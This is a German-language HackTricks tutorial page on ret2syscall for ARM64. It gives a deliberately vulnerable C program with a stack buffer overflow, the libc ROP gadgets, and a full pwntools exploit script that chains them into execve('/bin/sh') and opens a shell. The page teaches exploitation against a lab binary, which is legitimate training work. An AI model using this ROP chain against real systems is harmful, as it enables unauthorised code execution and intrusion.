German - Ht
HackTricks Training Twitter Linkedin Sponsor

Ret2syscall - ARM64

Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Finden Sie eine Einführung in arm64 in:

pageIntroduction to ARM64v8

Code

Wir werden das Beispiel von der Seite verwenden:

pageRet2win - arm64
#include <stdio.h>
#include <unistd.h>

void win() {
printf("Congratulations!\n");
}

void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}

int main() {
vulnerable_function();
return 0;
}

Kompilieren ohne PIE und Canary:

clang -o ret2win ret2win.c -fno-stack-protector

Gadgets

Um den Aufruf für den Syscall vorzubereiten, ist die folgende Konfiguration erforderlich:

  • x8: 221 Sys_execve angeben

  • x0: Zeiger auf "/bin/sh" gibt die auszuführende Datei an

  • x1: 0 gibt an, dass keine Argumente übergeben wurden

  • x2: 0 gibt an, dass keine Umgebungsvariablen übergeben wurden

Mit ROPgadget.py konnte ich die folgenden Gadgets in der libc-Bibliothek der Maschine lokalisieren:

;Load x0, x1 and x3 from stack and x5 and call x5
0x0000000000114c30:
ldp x3, x0, [sp, #8] ;
ldp x1, x4, [sp, #0x18] ;
ldr x5, [sp, #0x58] ;
ldr x2, [sp, #0xe0] ;
blr x5

;Move execve syscall (0xdd) to x8 and call it
0x00000000000bb97c :
nop ;
nop ;
mov x8, #0xdd ;
svc #0

Mit den vorherigen Gadgets können wir alle benötigten Register vom Stapel aus steuern und x5 verwenden, um zum zweiten Gadget zu springen und den Syscall aufzurufen.

Beachten Sie, dass das Wissen über diese Informationen aus der libc-Bibliothek auch einen ret2libc-Angriff ermöglicht, aber lassen Sie uns dies für das aktuelle Beispiel verwenden.

Ausnutzen

from pwn import *

p = process('./ret2syscall')
elf = context.binary = ELF('./ret2syscall')
libc = ELF("/usr/lib/aarch64-linux-gnu/libc.so.6")
libc.address = 0x0000fffff7df0000 # ASLR disabled
binsh = next(libc.search(b"/bin/sh"))

stack_offset = 72

#0x0000000000114c2c : bl #0x133070 ; ldp x3, x0, [sp, #8] ; ldp x1, x4, [sp, #0x18] ; ldr x5, [sp, #0x58] ; ldr x2, [sp, #0xe0] ; blr x5
load_x0_x1_x2 = libc.address + 0x114c30 # ldp x3, x0, [sp, #8] ; ldp x1, x4, [sp, #0x18] ; ldr x5, [sp, #0x58] ; ldr x2, [sp, #0xe0] ; blr x5

# 0x00000000000bb97c : nop ; nop ; mov x8, #0xdd ; svc #0
call_execve = libc.address + 0xbb97c

print("/bin/sh in: " + hex(binsh))
print("load_x0_x1_x2 in: " + hex(load_x0_x1_x2))
print("call_execve in: " + hex(call_execve))

# stack offset
bof = b"A" * (stack_offset)
bof += p64(load_x0_x1_x2)

# ldp x3, x0, [sp, #8]
rop = b"BBBBBBBBBBBBBBBB" #x3
rop += p64(binsh) #x0

# ldp x1, x4, [sp, #0x18]
rop += b"C"*(0x18 - len(rop))
rop += p64(0x00) # x1
rop += b"CCCCCCCC" #x4

# ldr x5, [sp, #0x58]
rop += b"D"*(0x58 - len(rop))
rop += p64(call_execve) # x5

# ldr x2, [sp, #0xe0]
rop += b"E" * (0xe0 - len(rop))
rop += p64(0x00) # x2

payload = bof + rop

p.sendline(payload)

p.interactive()
Erlernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

PreviousRet2syscallNextRet2vDSO

Last updated